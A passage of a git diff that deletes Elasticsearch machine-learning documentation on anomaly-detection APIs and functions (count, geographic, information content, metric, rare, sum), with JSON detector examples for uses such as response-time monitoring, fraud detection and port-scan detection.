- "retain": true - } -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/validate-detector.asciidoc b/docs/reference/ml/anomaly-detection/apis/validate-detector.asciidoc deleted file mode 100644 index d588bb61d28..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/validate-detector.asciidoc +++ /dev/null @@ -1,58 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-valid-detector]] -= Validate detectors API -++++ -Validate detectors -++++ - -Validates detector configuration information. - -[[ml-valid-detector-request]] -== {api-request-title} - -`POST _ml/anomaly_detectors/_validate/detector` - -[[ml-valid-detector-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-valid-detector-desc]] -== {api-description-title} - -This API enables you to validate the detector configuration -before you create an {anomaly-job}. - -[[ml-valid-detector-request-body]] -== {api-request-body-title} - -For a list of the properties that you can specify in the body of this API, -see detector configuration objects. - -[[ml-valid-detector-example]] -== {api-examples-title} - -The following example validates detector configuration information: - -[source,console] --------------------------------------------------- -POST _ml/anomaly_detectors/_validate/detector -{ - "function": "metric", - "field_name": "responsetime", - "by_field_name": "airline" -} --------------------------------------------------- -// TEST[skip:needs-licence] - -When the validation completes, you receive the following results: - -[source,console-result] ----- -{ - "acknowledged": true -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/validate-job.asciidoc b/docs/reference/ml/anomaly-detection/apis/validate-job.asciidoc deleted file mode 100644 index c522c76b3f5..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/validate-job.asciidoc +++ /dev/null @@ -1,69 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-valid-job]] -= Validate {anomaly-jobs} API -++++ -Validate jobs -++++ - -Validates {anomaly-job} configuration information. - -[[ml-valid-job-request]] -== {api-request-title} - -`POST _ml/anomaly_detectors/_validate` - -[[ml-valid-job-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-valid-job-desc]] -== {api-description-title} - -This API enables you to validate the {anomaly-job} configuration before you -create the job. - -[[ml-valid-job-request-body]] -== {api-request-body-title} - -For a list of the properties that you can specify in the body of this API, -see <>. 
- -[[ml-valid-job-example]] -== {api-examples-title} - -The following example validates job configuration information: - -[source,console] --------------------------------------------------- -POST _ml/anomaly_detectors/_validate -{ - "description": "Unusual response times by airlines", - "analysis_config": { - "bucket_span": "300S", - "detectors": [ - { - "function": "metric", - "field_name": "responsetime", - "by_field_name": "airline" } ], - "influencers": [ "airline" ] - }, - "data_description": { - "time_field": "time", - "time_format": "yyyy-MM-dd'T'HH:mm:ssX" - } -} --------------------------------------------------- -// TEST[skip:needs-licence] - -When the validation is complete, you receive the following results: - -[source,console-result] ----- -{ - "acknowledged": true -} ----- diff --git a/docs/reference/ml/anomaly-detection/functions/ml-count-functions.asciidoc b/docs/reference/ml/anomaly-detection/functions/ml-count-functions.asciidoc deleted file mode 100644 index 277de36aa4b..00000000000 --- a/docs/reference/ml/anomaly-detection/functions/ml-count-functions.asciidoc +++ /dev/null @@ -1,286 +0,0 @@ -[role="xpack"] -[[ml-count-functions]] -= Count functions - -Count functions detect anomalies when the number of events in a bucket is -anomalous. - -Use `non_zero_count` functions if your data is sparse and you want to ignore -cases where the bucket count is zero. - -Use `distinct_count` functions to determine when the number of distinct values -in one field is unusual, as opposed to the total count. - -Use high-sided functions if you want to monitor unusually high event rates. -Use low-sided functions if you want to look at drops in event rate. - -The {ml-features} include the following count functions: - -* xref:ml-count[`count`, `high_count`, `low_count`] -* xref:ml-nonzero-count[`non_zero_count`, `high_non_zero_count`, `low_non_zero_count`] -* xref:ml-distinct-count[`distinct_count`, `high_distinct_count`, `low_distinct_count`] - -[discrete] -[[ml-count]] -== Count, high_count, low_count - -The `count` function detects anomalies when the number of events in a bucket is -anomalous. - -The `high_count` function detects anomalies when the count of events in a -bucket are unusually high. - -The `low_count` function detects anomalies when the count of events in a -bucket are unusually low. - -These functions support the following properties: - -* `by_field_name` (optional) -* `over_field_name` (optional) -* `partition_field_name` (optional) - -For more information about those properties, see the -{ref}/ml-put-job.html#ml-put-job-request-body[create {anomaly-jobs} API]. - -.Example 1: Analyzing events with the count function -[source,console] --------------------------------------------------- -PUT _ml/anomaly_detectors/example1 -{ - "analysis_config": { - "detectors": [{ - "function" : "count" - }] - }, - "data_description": { - "time_field":"timestamp", - "time_format": "epoch_ms" - } -} --------------------------------------------------- -// TEST[skip:needs-licence] - -This example is probably the simplest possible analysis. It identifies -time buckets during which the overall count of events is higher or lower than -usual. - -When you use this function in a detector in your {anomaly-job}, it models the -event rate and detects when the event rate is unusual compared to its past -behavior. 
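A variation on example 1 splits the analysis with `partition_field_name`, so that a separate event-rate model is built for each value of the field. The `datacenter` field and job name below are hypothetical.

[source,console]
--------------------------------------------------
PUT _ml/anomaly_detectors/example1_partitioned
{
  "analysis_config": {
    "detectors": [{
      "function" : "count",
      "partition_field_name" : "datacenter"
    }]
  },
  "data_description": {
    "time_field":"timestamp",
    "time_format": "epoch_ms"
  }
}
--------------------------------------------------
// TEST[skip:illustrative sketch with hypothetical field names]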
- -.Example 2: Analyzing errors with the high_count function -[source,console] --------------------------------------------------- -PUT _ml/anomaly_detectors/example2 -{ - "analysis_config": { - "detectors": [{ - "function" : "high_count", - "by_field_name" : "error_code", - "over_field_name": "user" - }] - }, - "data_description": { - "time_field":"timestamp", - "time_format": "epoch_ms" - } -} --------------------------------------------------- -// TEST[skip:needs-licence] - -If you use this `high_count` function in a detector in your {anomaly-job}, it -models the event rate for each error code. It detects users that generate an -unusually high count of error codes compared to other users. - - -.Example 3: Analyzing status codes with the low_count function -[source,console] --------------------------------------------------- -PUT _ml/anomaly_detectors/example3 -{ - "analysis_config": { - "detectors": [{ - "function" : "low_count", - "by_field_name" : "status_code" - }] - }, - "data_description": { - "time_field":"timestamp", - "time_format": "epoch_ms" - } -} --------------------------------------------------- -// TEST[skip:needs-licence] - -In this example, the function detects when the count of events for a -status code is lower than usual. - -When you use this function in a detector in your {anomaly-job}, it models the -event rate for each status code and detects when a status code has an unusually -low count compared to its past behavior. - -.Example 4: Analyzing aggregated data with the count function -[source,console] --------------------------------------------------- -PUT _ml/anomaly_detectors/example4 -{ - "analysis_config": { - "summary_count_field_name" : "events_per_min", - "detectors": [{ - "function" : "count" - }] - }, - "data_description": { - "time_field":"timestamp", - "time_format": "epoch_ms" - } -} --------------------------------------------------- -// TEST[skip:needs-licence] - -If you are analyzing an aggregated `events_per_min` field, do not use a sum -function (for example, `sum(events_per_min)`). Instead, use the count function -and the `summary_count_field_name` property. For more information, see -<>. - -[discrete] -[[ml-nonzero-count]] -== Non_zero_count, high_non_zero_count, low_non_zero_count - -The `non_zero_count` function detects anomalies when the number of events in a -bucket is anomalous, but it ignores cases where the bucket count is zero. Use -this function if you know your data is sparse or has gaps and the gaps are not -important. - -The `high_non_zero_count` function detects anomalies when the number of events -in a bucket is unusually high and it ignores cases where the bucket count is -zero. - -The `low_non_zero_count` function detects anomalies when the number of events in -a bucket is unusually low and it ignores cases where the bucket count is zero. - -These functions support the following properties: - -* `by_field_name` (optional) -* `partition_field_name` (optional) - -For more information about those properties, see the -{ref}/ml-put-job.html#ml-put-job-request-body[create {anomaly-jobs} API]. 
- -For example, if you have the following number of events per bucket: - -======================================== - -1,22,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,43,31,0,0,0,0,0,0,0,0,0,0,0,0,2,1 - -======================================== - -The `non_zero_count` function models only the following data: - -======================================== - -1,22,2,43,31,2,1 - -======================================== - -.Example 5: Analyzing signatures with the high_non_zero_count function -[source,console] --------------------------------------------------- -PUT _ml/anomaly_detectors/example5 -{ - "analysis_config": { - "detectors": [{ - "function" : "high_non_zero_count", - "by_field_name" : "signaturename" - }] - }, - "data_description": { - "time_field":"timestamp", - "time_format": "epoch_ms" - } -} --------------------------------------------------- -// TEST[skip:needs-licence] - -If you use this `high_non_zero_count` function in a detector in your -{anomaly-job}, it models the count of events for the `signaturename` field. It -ignores any buckets where the count is zero and detects when a `signaturename` -value has an unusually high count of events compared to its past behavior. - -NOTE: Population analysis (using an `over_field_name` property value) is not -supported for the `non_zero_count`, `high_non_zero_count`, and -`low_non_zero_count` functions. If you want to do population analysis and your -data is sparse, use the `count` functions, which are optimized for that scenario. - - -[discrete] -[[ml-distinct-count]] -== Distinct_count, high_distinct_count, low_distinct_count - -The `distinct_count` function detects anomalies where the number of distinct -values in one field is unusual. - -The `high_distinct_count` function detects unusually high numbers of distinct -values in one field. - -The `low_distinct_count` function detects unusually low numbers of distinct -values in one field. - -These functions support the following properties: - -* `field_name` (required) -* `by_field_name` (optional) -* `over_field_name` (optional) -* `partition_field_name` (optional) - -For more information about those properties, see the -{ref}/ml-put-job.html#ml-put-job-request-body[create {anomaly-jobs} API]. - -.Example 6: Analyzing users with the distinct_count function -[source,console] --------------------------------------------------- -PUT _ml/anomaly_detectors/example6 -{ - "analysis_config": { - "detectors": [{ - "function" : "distinct_count", - "field_name" : "user" - }] - }, - "data_description": { - "time_field":"timestamp", - "time_format": "epoch_ms" - } -} --------------------------------------------------- -// TEST[skip:needs-licence] - -This `distinct_count` function detects when a system has an unusual number -of logged in users. When you use this function in a detector in your -{anomaly-job}, it models the distinct count of users. It also detects when the -distinct number of users is unusual compared to the past. - -.Example 7: Analyzing ports with the high_distinct_count function -[source,console] --------------------------------------------------- -PUT _ml/anomaly_detectors/example7 -{ - "analysis_config": { - "detectors": [{ - "function" : "high_distinct_count", - "field_name" : "dst_port", - "over_field_name": "src_ip" - }] - }, - "data_description": { - "time_field":"timestamp", - "time_format": "epoch_ms" - } -} --------------------------------------------------- -// TEST[skip:needs-licence] - -This example detects instances of port scanning. 
When you use this function in a -detector in your {anomaly-job}, it models the distinct count of ports. It also -detects the `src_ip` values that connect to an unusually high number of different -`dst_ports` values compared to other `src_ip` values. diff --git a/docs/reference/ml/anomaly-detection/functions/ml-functions.asciidoc b/docs/reference/ml/anomaly-detection/functions/ml-functions.asciidoc deleted file mode 100644 index b0481001dd5..00000000000 --- a/docs/reference/ml/anomaly-detection/functions/ml-functions.asciidoc +++ /dev/null @@ -1,43 +0,0 @@ -[role="xpack"] -[[ml-functions]] -= Function reference - -The {ml-features} include analysis functions that provide a wide variety of -flexible ways to analyze data for anomalies. - -When you create {anomaly-jobs}, you specify one or more detectors, which define -the type of analysis that needs to be done. If you are creating your job by -using {ml} APIs, you specify the functions in detector configuration objects. -If you are creating your job in {kib}, you specify the functions differently -depending on whether you are creating single metric, multi-metric, or advanced -jobs. - -Most functions detect anomalies in both low and high values. In statistical -terminology, they apply a two-sided test. Some functions offer low and high -variations (for example, `count`, `low_count`, and `high_count`). These variations -apply one-sided tests, detecting anomalies only when the values are low or -high, depending one which alternative is used. - -You can specify a `summary_count_field_name` with any function except `metric`. -When you use `summary_count_field_name`, the {ml} features expect the input -data to be pre-aggregated. The value of the `summary_count_field_name` field -must contain the count of raw events that were summarized. In {kib}, use the -**summary_count_field_name** in advanced {anomaly-jobs}. Analyzing aggregated -input data provides a significant boost in performance. For more information, see -<>. - -If your data is sparse, there may be gaps in the data which means you might have -empty buckets. You might want to treat these as anomalies or you might want these -gaps to be ignored. Your decision depends on your use case and what is important -to you. It also depends on which functions you use. The `sum` and `count` -functions are strongly affected by empty buckets. For this reason, there are -`non_null_sum` and `non_zero_count` functions, which are tolerant to sparse data. -These functions effectively ignore empty buckets. - -* <> -* <> -* <> -* <> -* <> -* <> -* <> diff --git a/docs/reference/ml/anomaly-detection/functions/ml-geo-functions.asciidoc b/docs/reference/ml/anomaly-detection/functions/ml-geo-functions.asciidoc deleted file mode 100644 index 68ab3261fc9..00000000000 --- a/docs/reference/ml/anomaly-detection/functions/ml-geo-functions.asciidoc +++ /dev/null @@ -1,79 +0,0 @@ -[role="xpack"] -[[ml-geo-functions]] -= Geographic functions - -The geographic functions detect anomalies in the geographic location of the -input data. - -The {ml-features} include the following geographic function: `lat_long`. - -NOTE: You cannot create forecasts for {anomaly-jobs} that contain geographic -functions. You also cannot add rules with conditions to detectors that use -geographic functions. - -[discrete] -[[ml-lat-long]] -== Lat_long - -The `lat_long` function detects anomalies in the geographic location of the -input data. 
- -This function supports the following properties: - -* `field_name` (required) -* `by_field_name` (optional) -* `over_field_name` (optional) -* `partition_field_name` (optional) - -For more information about those properties, see the -{ref}/ml-put-job.html#ml-put-job-request-body[create {anomaly-jobs} API]. - -.Example 1: Analyzing transactions with the lat_long function -[source,console] --------------------------------------------------- -PUT _ml/anomaly_detectors/example1 -{ - "analysis_config": { - "detectors": [{ - "function" : "lat_long", - "field_name" : "transactionCoordinates", - "by_field_name" : "creditCardNumber" - }] - }, - "data_description": { - "time_field":"timestamp", - "time_format": "epoch_ms" - } -} --------------------------------------------------- -// TEST[skip:needs-licence] - -If you use this `lat_long` function in a detector in your {anomaly-job}, it -detects anomalies where the geographic location of a credit card transaction is -unusual for a particular customer’s credit card. An anomaly might indicate fraud. - -IMPORTANT: The `field_name` that you supply must be a single string that contains -two comma-separated numbers of the form `latitude,longitude`, a `geo_point` field, -a `geo_shape` field that contains point values, or a `geo_centroid` aggregation. -The `latitude` and `longitude` must be in the range -180 to 180 and represent a -point on the surface of the Earth. - -For example, JSON data might contain the following transaction coordinates: - -[source,js] --------------------------------------------------- -{ - "time": 1460464275, - "transactionCoordinates": "40.7,-74.0", - "creditCardNumber": "1234123412341234" -} --------------------------------------------------- -// NOTCONSOLE - -In {es}, location data is likely to be stored in `geo_point` fields. For more -information, see {ref}/geo-point.html[Geo-point data type]. This data type is -supported natively in {ml-features}. Specifically, {dfeed} when pulling data from -a `geo_point` field, will transform the data into the appropriate `lat,lon` string -format before sending to the {anomaly-job}. - -For more information, see <>. diff --git a/docs/reference/ml/anomaly-detection/functions/ml-info-functions.asciidoc b/docs/reference/ml/anomaly-detection/functions/ml-info-functions.asciidoc deleted file mode 100644 index 81d8c740044..00000000000 --- a/docs/reference/ml/anomaly-detection/functions/ml-info-functions.asciidoc +++ /dev/null @@ -1,90 +0,0 @@ -[[ml-info-functions]] -= Information Content Functions - -The information content functions detect anomalies in the amount of information -that is contained in strings within a bucket. These functions can be used as -a more sophisticated method to identify incidences of data exfiltration or -C2 (Command and Control) activity, when analyzing the size in bytes of the data might not be sufficient. - -The {ml-features} include the following information content functions: - -* `info_content`, `high_info_content`, `low_info_content` - -[discrete] -[[ml-info-content]] -== Info_content, High_info_content, Low_info_content - -The `info_content` function detects anomalies in the amount of information that -is contained in strings in a bucket. - -If you want to monitor for unusually high amounts of information, -use `high_info_content`. -If want to look at drops in information content, use `low_info_content`. 
- -These functions support the following properties: - -* `field_name` (required) -* `by_field_name` (optional) -* `over_field_name` (optional) -* `partition_field_name` (optional) - -For more information about those properties, see the -{ref}/ml-put-job.html#ml-put-job-request-body[create {anomaly-jobs} API]. - -.Example 1: Analyzing subdomain strings with the info_content function -[source,js] --------------------------------------------------- -{ - "function" : "info_content", - "field_name" : "subdomain", - "over_field_name" : "highest_registered_domain" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `info_content` function in a detector in your {anomaly-job}, it -models information that is present in the `subdomain` string. It detects -anomalies where the information content is unusual compared to the other -`highest_registered_domain` values. An anomaly could indicate an abuse of the -DNS protocol, such as malicious command and control activity. - -NOTE: In this example, both high and low values are considered anomalous. -In many use cases, the `high_info_content` function is often a more appropriate -choice. - -.Example 2: Analyzing query strings with the high_info_content function -[source,js] --------------------------------------------------- -{ - "function" : "high_info_content", - "field_name" : "query", - "over_field_name" : "src_ip" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `high_info_content` function in a detector in your {anomaly-job}, -it models information content that is held in the DNS query string. It detects -`src_ip` values where the information content is unusually high compared to -other `src_ip` values. This example is similar to the example for the -`info_content` function, but it reports anomalies only where the amount of -information content is higher than expected. - -.Example 3: Analyzing message strings with the low_info_content function -[source,js] --------------------------------------------------- -{ - "function" : "low_info_content", - "field_name" : "message", - "by_field_name" : "logfilename" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `low_info_content` function in a detector in your {anomaly-job}, -it models information content that is present in the message string for each -`logfilename`. It detects anomalies where the information content is low -compared to its past behavior. For example, this function detects unusually low -amounts of information in a collection of rolling log files. Low information -might indicate that a process has entered an infinite loop or that logging -features have been disabled. diff --git a/docs/reference/ml/anomaly-detection/functions/ml-metric-functions.asciidoc b/docs/reference/ml/anomaly-detection/functions/ml-metric-functions.asciidoc deleted file mode 100644 index e009da0050e..00000000000 --- a/docs/reference/ml/anomaly-detection/functions/ml-metric-functions.asciidoc +++ /dev/null @@ -1,326 +0,0 @@ -[role="xpack"] -[[ml-metric-functions]] -= Metric functions - -The metric functions include functions such as mean, min and max. These values -are calculated for each bucket. Field values that cannot be converted to -double precision floating point numbers are ignored. 
- -The {ml-features} include the following metric functions: - -* <> -* <> -* xref:ml-metric-median[`median`, `high_median`, `low_median`] -* xref:ml-metric-mean[`mean`, `high_mean`, `low_mean`] -* <> -* xref:ml-metric-varp[`varp`, `high_varp`, `low_varp`] - -NOTE: You cannot add rules with conditions to detectors that use the `metric` -function. - -[discrete] -[[ml-metric-min]] -== Min - -The `min` function detects anomalies in the arithmetic minimum of a value. -The minimum value is calculated for each bucket. - -High- and low-sided functions are not applicable. - -This function supports the following properties: - -* `field_name` (required) -* `by_field_name` (optional) -* `over_field_name` (optional) -* `partition_field_name` (optional) - -For more information about those properties, see the -{ref}/ml-put-job.html#ml-put-job-request-body[create {anomaly-jobs} API]. - -.Example 1: Analyzing minimum transactions with the min function -[source,js] --------------------------------------------------- -{ - "function" : "min", - "field_name" : "amt", - "by_field_name" : "product" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `min` function in a detector in your {anomaly-job}, it detects -where the smallest transaction is lower than previously observed. You can use -this function to detect items for sale at unintentionally low prices due to data -entry mistakes. It models the minimum amount for each product over time. - -[discrete] -[[ml-metric-max]] -== Max - -The `max` function detects anomalies in the arithmetic maximum of a value. -The maximum value is calculated for each bucket. - -High- and low-sided functions are not applicable. - -This function supports the following properties: - -* `field_name` (required) -* `by_field_name` (optional) -* `over_field_name` (optional) -* `partition_field_name` (optional) - -For more information about those properties, see the -{ref}/ml-put-job.html#ml-put-job-request-body[create {anomaly-jobs} API]. - -.Example 2: Analyzing maximum response times with the max function -[source,js] --------------------------------------------------- -{ - "function" : "max", - "field_name" : "responsetime", - "by_field_name" : "application" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `max` function in a detector in your {anomaly-job}, it detects -where the longest `responsetime` is longer than previously observed. You can use -this function to detect applications that have `responsetime` values that are -unusually lengthy. It models the maximum `responsetime` for each application -over time and detects when the longest `responsetime` is unusually long compared -to previous applications. - -.Example 3: Two detectors with max and high_mean functions -[source,js] --------------------------------------------------- -{ - "function" : "max", - "field_name" : "responsetime", - "by_field_name" : "application" -}, -{ - "function" : "high_mean", - "field_name" : "responsetime", - "by_field_name" : "application" -} --------------------------------------------------- -// NOTCONSOLE - -The analysis in the previous example can be performed alongside `high_mean` -functions by application. By combining detectors and using the same influencer -this job can detect both unusually long individual response times and average -response times for each bucket. 
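To make the combination in Example 3 concrete, the following sketch shows the two detectors in one complete job that uses `application` as the shared influencer. The job name, bucket span, and `data_description` values are assumptions and are not taken from the example itself:

[source,console]
--------------------------------------------------
PUT _ml/anomaly_detectors/example_combined
{
  "analysis_config": {
    "bucket_span": "10m",
    "detectors": [
      {
        "function": "max",
        "field_name": "responsetime",
        "by_field_name": "application"
      },
      {
        "function": "high_mean",
        "field_name": "responsetime",
        "by_field_name": "application"
      }
    ],
    "influencers": ["application"]
  },
  "data_description": {
    "time_field": "timestamp",
    "time_format": "epoch_ms"
  }
}
--------------------------------------------------
// TEST[skip:needs-licence]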
- -[discrete] -[[ml-metric-median]] -== Median, high_median, low_median - -The `median` function detects anomalies in the statistical median of a value. -The median value is calculated for each bucket. - -If you want to monitor unusually high median values, use the `high_median` -function. - -If you are just interested in unusually low median values, use the `low_median` -function. - -These functions support the following properties: - -* `field_name` (required) -* `by_field_name` (optional) -* `over_field_name` (optional) -* `partition_field_name` (optional) - -For more information about those properties, see the -{ref}/ml-put-job.html#ml-put-job-request-body[create {anomaly-jobs} API]. - -.Example 4: Analyzing response times with the median function -[source,js] --------------------------------------------------- -{ - "function" : "median", - "field_name" : "responsetime", - "by_field_name" : "application" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `median` function in a detector in your {anomaly-job}, it models -the median `responsetime` for each application over time. It detects when the -median `responsetime` is unusual compared to previous `responsetime` values. - -[discrete] -[[ml-metric-mean]] -== Mean, high_mean, low_mean - -The `mean` function detects anomalies in the arithmetic mean of a value. -The mean value is calculated for each bucket. - -If you want to monitor unusually high average values, use the `high_mean` -function. - -If you are just interested in unusually low average values, use the `low_mean` -function. - -These functions support the following properties: - -* `field_name` (required) -* `by_field_name` (optional) -* `over_field_name` (optional) -* `partition_field_name` (optional) - -For more information about those properties, see the -{ref}/ml-put-job.html#ml-put-job-request-body[create {anomaly-jobs} API]. - -.Example 5: Analyzing response times with the mean function -[source,js] --------------------------------------------------- -{ - "function" : "mean", - "field_name" : "responsetime", - "by_field_name" : "application" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `mean` function in a detector in your {anomaly-job}, it models -the mean `responsetime` for each application over time. It detects when the mean -`responsetime` is unusual compared to previous `responsetime` values. - -.Example 6: Analyzing response times with the high_mean function -[source,js] --------------------------------------------------- -{ - "function" : "high_mean", - "field_name" : "responsetime", - "by_field_name" : "application" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `high_mean` function in a detector in your {anomaly-job}, it -models the mean `responsetime` for each application over time. It detects when -the mean `responsetime` is unusually high compared to previous `responsetime` -values. - -.Example 7: Analyzing response times with the low_mean function -[source,js] --------------------------------------------------- -{ - "function" : "low_mean", - "field_name" : "responsetime", - "by_field_name" : "application" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `low_mean` function in a detector in your {anomaly-job}, it -models the mean `responsetime` for each application over time. It detects when -the mean `responsetime` is unusually low compared to previous `responsetime` -values. 
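The snippets in these examples are detector objects rather than complete jobs, so they cannot be run as-is. One way to check such a snippet before adding it to a job is the validate detectors API; the following sketch reuses the detector from Example 7:

[source,console]
--------------------------------------------------
POST _ml/anomaly_detectors/_validate/detector
{
  "function": "low_mean",
  "field_name": "responsetime",
  "by_field_name": "application"
}
--------------------------------------------------
// TEST[skip:needs-licence]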
- -[discrete] -[[ml-metric-metric]] -== Metric - -The `metric` function combines `min`, `max`, and `mean` functions. You can use -it as a shorthand for a combined analysis. If you do not specify a function in -a detector, this is the default function. - -High- and low-sided functions are not applicable. You cannot use this function -when a `summary_count_field_name` is specified. - -This function supports the following properties: - -* `field_name` (required) -* `by_field_name` (optional) -* `over_field_name` (optional) -* `partition_field_name` (optional) - -For more information about those properties, see the -{ref}/ml-put-job.html#ml-put-job-request-body[create {anomaly-jobs} API]. - -.Example 8: Analyzing response times with the metric function -[source,js] --------------------------------------------------- -{ - "function" : "metric", - "field_name" : "responsetime", - "by_field_name" : "application" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `metric` function in a detector in your {anomaly-job}, it models -the mean, min, and max `responsetime` for each application over time. It detects -when the mean, min, or max `responsetime` is unusual compared to previous -`responsetime` values. - -[discrete] -[[ml-metric-varp]] -== Varp, high_varp, low_varp - -The `varp` function detects anomalies in the variance of a value which is a -measure of the variability and spread in the data. - -If you want to monitor unusually high variance, use the `high_varp` function. - -If you are just interested in unusually low variance, use the `low_varp` function. - -These functions support the following properties: - -* `field_name` (required) -* `by_field_name` (optional) -* `over_field_name` (optional) -* `partition_field_name` (optional) - -For more information about those properties, see the -{ref}/ml-put-job.html#ml-put-job-request-body[create {anomaly-jobs} API]. - -.Example 9: Analyzing response times with the varp function -[source,js] --------------------------------------------------- -{ - "function" : "varp", - "field_name" : "responsetime", - "by_field_name" : "application" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `varp` function in a detector in your {anomaly-job}, it models -the variance in values of `responsetime` for each application over time. It -detects when the variance in `responsetime` is unusual compared to past -application behavior. - -.Example 10: Analyzing response times with the high_varp function -[source,js] --------------------------------------------------- -{ - "function" : "high_varp", - "field_name" : "responsetime", - "by_field_name" : "application" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `high_varp` function in a detector in your {anomaly-job}, it -models the variance in values of `responsetime` for each application over time. -It detects when the variance in `responsetime` is unusual compared to past -application behavior. - -.Example 11: Analyzing response times with the low_varp function -[source,js] --------------------------------------------------- -{ - "function" : "low_varp", - "field_name" : "responsetime", - "by_field_name" : "application" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `low_varp` function in a detector in your {anomaly-job}, it -models the variance in values of `responsetime` for each application over time. 
-It detects when the variance in `responsetime` is unusual compared to past -application behavior. diff --git a/docs/reference/ml/anomaly-detection/functions/ml-rare-functions.asciidoc b/docs/reference/ml/anomaly-detection/functions/ml-rare-functions.asciidoc deleted file mode 100644 index f0a788698a3..00000000000 --- a/docs/reference/ml/anomaly-detection/functions/ml-rare-functions.asciidoc +++ /dev/null @@ -1,137 +0,0 @@ -[role="xpack"] -[[ml-rare-functions]] -= Rare functions - -The rare functions detect values that occur rarely in time or rarely for a -population. - -The `rare` analysis detects anomalies according to the number of distinct rare -values. This differs from `freq_rare`, which detects anomalies according to the -number of times (frequency) rare values occur. - -[NOTE] -==== -* The `rare` and `freq_rare` functions should not be used in conjunction with -`exclude_frequent`. -* You cannot create forecasts for {anomaly-jobs} that contain `rare` or -`freq_rare` functions. -* You cannot add rules with conditions to detectors that use `rare` or -`freq_rare` functions. -* Shorter bucket spans (less than 1 hour, for example) are recommended when -looking for rare events. The functions model whether something happens in a -bucket at least once. With longer bucket spans, it is more likely that -entities will be seen in a bucket and therefore they appear less rare. -Picking the ideal bucket span depends on the characteristics of the data -with shorter bucket spans typically being measured in minutes, not hours. -* To model rare data, a learning period of at least 20 buckets is required -for typical data. -==== - -The {ml-features} include the following rare functions: - -* <> -* <> - - -[discrete] -[[ml-rare]] -== Rare - -The `rare` function detects values that occur rarely in time or rarely for a -population. It detects anomalies according to the number of distinct rare values. - -This function supports the following properties: - -* `by_field_name` (required) -* `over_field_name` (optional) -* `partition_field_name` (optional) - -For more information about those properties, see the -{ref}/ml-put-job.html#ml-put-job-request-body[create {anomaly-jobs} API]. - -.Example 1: Analyzing status codes with the rare function -[source,js] --------------------------------------------------- -{ - "function" : "rare", - "by_field_name" : "status" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `rare` function in a detector in your {anomaly-job}, it detects -values that are rare in time. It models status codes that occur over time and -detects when rare status codes occur compared to the past. For example, you can -detect status codes in a web access log that have never (or rarely) occurred -before. - -.Example 2: Analyzing status codes in a population with the rare function -[source,js] --------------------------------------------------- -{ - "function" : "rare", - "by_field_name" : "status", - "over_field_name" : "clientip" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `rare` function in a detector in your {anomaly-job}, it detects -values that are rare in a population. It models status code and client IP -interactions that occur. It defines a rare status code as one that occurs for -few client IP values compared to the population. It detects client IP values -that experience one or more distinct rare status codes compared to the -population. 
For example in a web access log, a `clientip` that experiences the -highest number of different rare status codes compared to the population is -regarded as highly anomalous. This analysis is based on the number of different -status code values, not the count of occurrences. - -NOTE: To define a status code as rare the {ml-features} look at the number -of distinct status codes that occur, not the number of times the status code -occurs. If a single client IP experiences a single unique status code, this -is rare, even if it occurs for that client IP in every bucket. - -[discrete] -[[ml-freq-rare]] -== Freq_rare - -The `freq_rare` function detects values that occur rarely for a population. -It detects anomalies according to the number of times (frequency) that rare -values occur. - -This function supports the following properties: - -* `by_field_name` (required) -* `over_field_name` (required) -* `partition_field_name` (optional) - -For more information about those properties, see the -{ref}/ml-put-job.html#ml-put-job-request-body[create {anomaly-jobs} API]. - -.Example 3: Analyzing URI values in a population with the freq_rare function -[source,js] --------------------------------------------------- -{ - "function" : "freq_rare", - "by_field_name" : "uri", - "over_field_name" : "clientip" -} --------------------------------------------------- -// NOTCONSOLE - -If you use this `freq_rare` function in a detector in your {anomaly-job}, it -detects values that are frequently rare in a population. It models URI paths and -client IP interactions that occur. It defines a rare URI path as one that is -visited by few client IP values compared to the population. It detects the -client IP values that experience many interactions with rare URI paths compared -to the population. For example in a web access log, a client IP that visits -one or more rare URI paths many times compared to the population is regarded as -highly anomalous. This analysis is based on the count of interactions with rare -URI paths, not the number of different URI path values. - - -NOTE: Defining a URI path as rare happens the same way as you can see in the -case of the status codes above: the analytics consider the number of distinct -values that occur and not the number of times the URI path occurs. If a single -client IP visits a single unique URI path, this is rare, even if it -occurs for that client IP in every bucket. diff --git a/docs/reference/ml/anomaly-detection/functions/ml-sum-functions.asciidoc b/docs/reference/ml/anomaly-detection/functions/ml-sum-functions.asciidoc deleted file mode 100644 index ec0d30365d6..00000000000 --- a/docs/reference/ml/anomaly-detection/functions/ml-sum-functions.asciidoc +++ /dev/null @@ -1,114 +0,0 @@ -[role="xpack"] -[[ml-sum-functions]] -= Sum functions - -The sum functions detect anomalies when the sum of a field in a bucket is -anomalous. - -If you want to monitor unusually high totals, use high-sided functions. - -If want to look at drops in totals, use low-sided functions. - -If your data is sparse, use `non_null_sum` functions. Buckets without values are -ignored; buckets with a zero value are analyzed. - -The {ml-features} include the following sum functions: - -* xref:ml-sum[`sum`, `high_sum`, `low_sum`] -* xref:ml-nonnull-sum[`non_null_sum`, `high_non_null_sum`, `low_non_null_sum`] - -[discrete] -[[ml-sum]] -== Sum, high_sum, low_sum - -The `sum` function detects anomalies where the sum of a field in a bucket is -anomalous. 
-
